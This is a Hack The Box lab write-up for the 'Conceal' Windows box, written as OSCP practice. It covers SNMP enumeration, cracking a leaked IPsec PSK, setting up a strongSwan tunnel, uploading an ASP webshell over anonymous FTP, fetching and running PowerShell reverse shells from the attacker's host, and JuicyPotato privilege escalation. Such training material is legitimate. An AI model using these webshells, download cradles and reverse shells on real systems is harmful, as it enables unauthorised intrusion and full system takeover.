Hack The Box: Conceal Write-up (#40)

This is my 40th box out of 42 boxes for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. So let’s begin.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and the services running on them.

./nmapAutomator.sh 10.10.10.116 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get back the following result:

root@kali:/htb/Conceal# bash /opt/nmapAutomator/nmapAutomator.sh 10.10.10.116 All
Running all scans on 10.10.10.116

Host is likely running Windows

---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 00:59 +08
Nmap done: 1 IP address (1 host up) scanned in 102.40 seconds

---------------------Starting Nmap Basic Scan---------------------

No ports in quick scan.. Skipping!

----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 01:01 +08
Nmap scan report for 10.10.10.116
Host is up (0.012s latency).
Not shown: 999 open|filtered ports
PORT    STATE SERVICE
500/udp open  isakmp
Nmap done: 1 IP address (1 host up) scanned in 194.21 seconds

Making a script scan on UDP ports: 500

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 01:04 +08
Nmap scan report for 10.10.10.116
Host is up.
PORT    STATE         SERVICE VERSION
500/udp open|filtered isakmp
|_ike-version: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.31 seconds
...

The quick TCP scan found no open ports at all, and we have exactly one open UDP port.

  • Port 500: isakmp (IKE)

Before we begin enumeration, let’s make quick mental notes about the scan results.

  1. A quick Google search tells us that the Internet Security Association and Key Management Protocol (ISAKMP) is the framework for establishing Security Associations (SAs) and cryptographic keys on the Internet. IKE is the key-exchange protocol built on ISAKMP, and IKE together with IPsec is what a VPN uses to set up an encrypted connection.
  2. To bring up a VPN through these protocols we need some authentication material, typically a pre-shared key (PSK). Since only one UDP port responded to our scan (and no TCP ports at all), let’s rerun a full UDP scan to see if we missed anything the first time.

Rerunning the UDP scan gives us an extra port.

root@kali:/htb/Conceal# nmap -vvv -sU -sV 10.10.10.116
...
Discovered open port 161/udp on 10.10.10.116

Port 161 is open. This normally runs SNMP service.

Service Enumeration

Port 161 (SNMP)

Let’s run Nmap scan for this port to see if it gives any interesting info.

nmap -sU -sC -sV -p 161 10.10.10.116
  • -sU: UDP scan
  • -p: Port
  • -sC: Run default scripts
  • -sV: Version Detection

We get back the following results.

From the above results (the snmp-* NSE scripts), the host speaks SNMP version 1 and answers the default “public” community string, so anyone on the network can read its MIB. The snmp-netstat output also lists listening ports, including FTP, HTTP, SMB and NTP, none of which answered our TCP scan. They are evidently only reachable once we are inside the IPsec tunnel, so to get at them we first need to establish that secure connection.

Let’s run snmpwalk to query SNMP for more information.

snmpwalk -v1 -c public 10.10.10.116
  • -v: SNMP version
  • -c: community string

We get back the following results.

root@kali:/htb/Conceal# cat snmpwalk.txt 
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (1177748) 3:16:17.48
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
...

The interesting part is the sysContact string (OID 1.3.6.1.2.1.1.4.0): it leaks what looks like the IKE VPN pre-shared key, stored as a 32-hex-character hash, the length of an unsalted MD5 digest. An unsalted hash of a short password is exactly what lookup tables are built for, so let’s look it up on CrackStation.

CrackStation returns the plaintext password, Dudecake1!. Let’s use it to try to establish a connection to the VPN.

Before doing that, find a transform set the server accepts using ike-scan, so that we know which IKE proposal to configure on our side.

ike-scan -M 10.10.10.116
  • -M: Multiline

We get back the following results.

As you can see, there is a field called Auth with the value PSK. This means the VPN authenticates with a pre-shared key (good for a pentester, since we already have a candidate key). The last line of the output is also important:

  • 1 returned handshake; 0 returned notify: the target is configured for IPsec and is willing to perform IKE negotiation, and one or more of the transforms we proposed is acceptable (the accepted transform is shown in the SA= line of the output).

Note that the responder completed a Main Mode handshake. Main Mode does not expose a PSK hash on the wire the way Aggressive Mode does (which is what ike-scan’s -P/--pskcrack option relies on), so without the SNMP leak we would have had no hash to crack.

Next, we’ll use strongswan to establish the IPsec connection.

Install strongswan.

apt install strongswan

We need to make changes to two files: ipsec.secrets and ipsec.conf.

In the /etc/ipsec.secrets add the following entry.

10.10.14.31 10.10.10.116 : PSK "Dudecake1!"

In /etc/ipsec.conf add the following conn. The ike= and esp= lines must match the transform ike-scan reported, and rightprotoport=tcp restricts the tunnel to TCP traffic towards the box (the traffic selector of the CHILD_SA established below shows [tcp] for that reason).

conn conceal
    # authenticate with the PSK from /etc/ipsec.secrets
    authby=secret
    auto=route
    # ike-scan negotiated IKEv1 Main Mode
    keyexchange=ikev1
    # phase 1 transform accepted by the responder
    ike=3des-sha1-modp1024
    left=10.10.14.31
    right=10.10.10.116
    type=transport
    # phase 2 (ESP) transform, same cipher and integrity algorithm
    esp=3des-sha1
    # only TCP to the box goes through the tunnel
    rightprotoport=tcp
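Here is an added Python example (my own, not from the post and not part of ike-scan or strongSwan) that reads ike-scan -M output and emits the matching strongSwan proposal strings, the ipsec.conf conn block and the ipsec.secrets line, so the two steps above are tied together mechanically. The sample output is constructed in ike-scan’s multiline format with the SA line the box accepted in this write-up; the attribute mapping tables and function names are my assumptions, and the ESP proposal simply reuses the phase-1 cipher and hash, as the configuration above does. It goes slightly beyond this box by handling AES key lengths and Aggressive Mode responders.

```python
import re

# Constructed sample in the format `ike-scan -M` prints; the SA line carries
# the transform the box accepted in this write-up (3DES/SHA1/modp1024/PSK).
SAMPLE_IKE_SCAN = """\
10.10.10.116\tMain Mode Handshake returned
\tSA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.030 seconds (33.33 hosts/sec).  1 returned handshake; 0 returned notify
"""

# ike-scan attribute values -> strongSwan proposal tokens (assumed; extend as needed).
ENC_MAP = {"DES": "des", "3DES": "3des", "AES": "aes"}
HASH_MAP = {"MD5": "md5", "SHA1": "sha1", "SHA2-256": "sha256",
            "SHA2-384": "sha384", "SHA2-512": "sha512"}


def parse_ike_scan(text):
    """Pull the responder, handshake mode, accepted SA attributes and the summary counts."""
    res = {"target": None, "mode": None, "sa": {}, "handshake": 0, "notify": 0}
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s+(Main|Aggressive) Mode Handshake returned", line)
        if m:
            res["target"], res["mode"] = m.group(1), m.group(2)
            continue
        m = re.search(r"SA=\((.*)\)", line)
        if m:
            # keys may contain parentheses, e.g. LifeDuration(4)=0x00007080
            res["sa"] = dict(re.findall(r"([\w()]+)=(\S+)", m.group(1)))
            continue
        m = re.search(r"(\d+) returned handshake; (\d+) returned notify", line)
        if m:
            res["handshake"], res["notify"] = int(m.group(1)), int(m.group(2))
    return res


def strongswan_proposals(sa):
    """Map an accepted SA to strongSwan's ike=/esp= notation (enc-integ-group, enc-integ)."""
    enc = ENC_MAP[sa["Enc"]]
    if enc == "aes":                        # ike-scan reports the AES key size separately
        enc += sa.get("KeyLength", "128")
    integ = HASH_MAP[sa["Hash"]]
    group = sa["Group"].split(":", 1)[-1]   # "2:modp1024" -> "modp1024"
    return f"{enc}-{integ}-{group}", f"{enc}-{integ}"


def render_strongswan(name, left, right, psk, scan):
    """Return (ipsec.conf conn block, ipsec.secrets line) for a PSK IKEv1 transport-mode connection."""
    if scan["handshake"] < 1:
        raise ValueError("no handshake returned: every proposed transform was rejected")
    if scan["sa"].get("Auth") != "PSK":
        raise ValueError(f"responder wants Auth={scan['sa'].get('Auth')}; a PSK will not work")
    ike, esp = strongswan_proposals(scan["sa"])
    lines = [
        f"conn {name}",
        "    authby=secret",
        "    auto=route",
        "    keyexchange=ikev1",
    ]
    if scan["mode"] == "Aggressive":        # responder only did Aggressive Mode
        lines.append("    aggressive=yes")
    lines += [
        f"    ike={ike}",
        f"    left={left}",
        f"    right={right}",
        "    type=transport",
        f"    esp={esp}",
        "    rightprotoport=tcp",
    ]
    secrets = f'{left} {right} : PSK "{psk}"'
    return "\n".join(lines), secrets


if __name__ == "__main__":
    scan = parse_ike_scan(SAMPLE_IKE_SCAN)
    conf, secrets = render_strongswan("conceal", "10.10.14.31", "10.10.10.116", "Dudecake1!", scan)
    print(conf)
    print(secrets)
```

Paste the printed conn block into /etc/ipsec.conf and the secrets line into /etc/ipsec.secrets, then restart strongSwan as shown next.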

Next, run the following command to establish the connection.

root@kali:/htb/Conceal# ipsec stop
Stopping strongSwan IPsec...
root@kali:/htb/Conceal# ipsec start
Starting strongSwan 5.8.4 IPsec [starter]...
root@kali:/htb/Conceal# ipsec up conceal
initiating Main Mode IKE_SA conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.14.31[500] to 10.10.10.116[500] (236 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.31[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
selected proposal: IKE:3DES_CBC/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.14.31[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.31[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH N(INITIAL_CONTACT) ]
sending packet: from 10.10.14.31[500] to 10.10.10.116[500] (100 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.31[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA conceal[1] established between 10.10.14.31[10.10.14.31]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 10032s
maximum IKE_SA lifetime 10572s
generating QUICK_MODE request 4150279273 [ HASH SA No ID ID ]
sending packet: from 10.10.14.31[500] to 10.10.10.116[500] (196 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.31[500] (188 bytes)
parsed QUICK_MODE response 4150279273 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
CHILD_SA conceal{2} established with SPIs cc0f2f64_i 9b6b47b0_o and TS 10.10.14.31/32 === 10.10.10.116/32[tcp]
generating QUICK_MODE request 4150279273 [ HASH ]
connection 'conceal' established successfully

Nice! The connection is established successfully. A TCP SYN scan (-sS) returned nothing through the tunnel: by default nmap crafts and sends its own raw packets instead of going through the kernel’s TCP stack, so they are never matched by the IPsec policy and leave our box unencrypted. A connect scan (-sT) uses ordinary sockets, so its traffic is protected by the tunnel and reaches the target.

nmap -sT -sC -sV -oA conceal 10.10.10.116

We get back the following results.

Nmap scan report for 10.10.10.116
Host is up (0.0087s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-12T20:58:22
|_ start_date: 2020-09-12T16:59:08
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.43 seconds

Service Enumeration (IPsec Connection)

Let’s begin with port 80.

Port 80 (HTTP)

Visit the index page.

Just default IIS page. Check the page source.

Nope, we have nothing useful here.

Next, run the gobuster scan.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.116 -t 50 -o gobuster.txt

We get back the following results.

...
/upload (Status: 301)
/Upload (Status: 301)

Visit the /upload path.

If there is any way to write into this upload directory, we can drop a web shell there and obtain our initial foothold.

Port 21 (FTP)

The Nmap scan results showed anonymous access is allowed.

root@kali:/htb/Conceal# ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>

Let’s test if we’re allowed to upload files. Create a test.txt file from Kali Linux.

echo "Test upload" > test.txt

Upload the test.txt file on the FTP server.

ftp> put test.txt 
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
13 bytes sent in 0.00 secs (235.0984 kB/s)
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
09-12-20 10:31PM 13 test.txt
226 Transfer complete.

The upload was successful. Let’s see whether the FTP root is the same directory IIS serves as /upload by requesting the file from the browser.

Great! http://10.10.10.116/upload/test.txt returns our file, so anything we put on the FTP server lands in the web root’s /upload directory. Nmap showed IIS 10, which can execute classic ASP and ASP.NET (ASPX) pages when the corresponding handlers are enabled. Let’s test both: create test.asp and test.aspx, upload them over FTP, then request both from /upload.

test.aspx returns status code 403 with a message ending in “… extension configuration.”, i.e. IIS is not configured to serve that extension.

But test.asp uploads and executes, so classic ASP is enabled. Let’s turn this into code execution.

Create a file shell.asp with the following contents.

<%
' Classic ASP (VBScript) under IIS: spawn a command shell through WScript.Shell
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami && cmd /c systeminfo")
' ReadAll blocks until the child process closes stdout, then we return its output to the browser
o = cmd.StdOut.ReadAll()
Response.Write(o)
%>

Then upload shell.asp on the FTP server and call it from the /upload directory.

Great! We have RCE. The IIS worker process runs as conceal\destitute, and systeminfo shows the target is Windows 10 Enterprise on x64. Let’s prepare a reverse shell.

Exploitation

Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following line to the end of the script with the Kali Linux machine configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 53

When called, this sends a reverse shell back to our Kali Linux machine on port 53.

Set up a Netcat listener on Kali Linux.

nc -nlvp 53

Next, change the code in shell.asp to download and execute the PowerShell script.

<%
' Download cradle: fetch shell.ps1 from our web server and run it in memory with IEX
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.31/shell.ps1')")
' ReadAll blocks for as long as the reverse shell is alive, so the browser request hangs; that is expected
o = cmd.StdOut.ReadAll()
Response.Write(o)
%>

Set up a simple python web server.

python3 -m http.server 80

Upload the shell.asp file on the FTP server and call it from the browser.

We get a shell! Grab the user flag.

Post-Exploitation Enumeration

Let’s check the privilege of the user with the following command.

whoami /priv

We get back the following results.

Destitute has SeImpersonatePrivilege enabled. This is good: with that privilege we can use the token impersonation technique to escalate to SYSTEM, using the automated tool JuicyPotato, which coerces a SYSTEM-owned COM server into authenticating to a local listener and impersonates the resulting token.

Privilege Escalation

Download the JuicyPotato.exe x64 binary from here and place it in your current working directory, so the Python web server can serve it. JuicyPotato only works on Windows 10 builds before 1809 (and Windows Server before 2019); the SNMP sysDescr earlier reported Build 15063 (Windows 10 1703), so it applies to this target.

Copy the Invoke-PowerShellTcp.ps1 to your working directory again and rename it as shell2.ps1.

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell2.ps1

Add the following line to the end of the script with the Kali Linux machine configuration.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 443

When called, this sends a reverse shell back to our Kali Linux machine on port 443.

Next, create a shell.bat file that downloads the above shell2.ps1 PowerShell script and executes it on the target machine.

powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.31/shell2.ps1')

Next, from the shell we already have, download shell.bat and the JuicyPotato binary to the target machine (both are served by the same Python web server).

(new-object net.webclient).downloadfile('http://10.10.14.31/shell.bat', 'C:\Users\Destitute\Desktop\shell.bat')
(new-object net.webclient).downloadfile('http://10.10.14.31/JuicyPotato.exe', 'C:\Users\Destitute\Desktop\JuicyPotato.exe')

Set up a listener on the attack machine to receive the reverse shell.

nc -nlvp 443

Get a CLSID for Windows 10 Enterprise from here (the CLSID list in the JuicyPotato repository).

Run the JuicyPotato executable from the Desktop directory as below.

./JuicyPotato.exe -p shell.bat -l 1337 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"
  • -p: program to launch with the stolen token
  • -l: local port the fake COM server listens on
  • -t: CreateProcess call to use (* tries both CreateProcessWithTokenW and CreateProcessAsUser)
  • -c: CLSID of the COM server to abuse

We get a shell back with SYSTEM privileges!

Grab the root flag.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Chatterbox.

--

Joshua Surendran

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.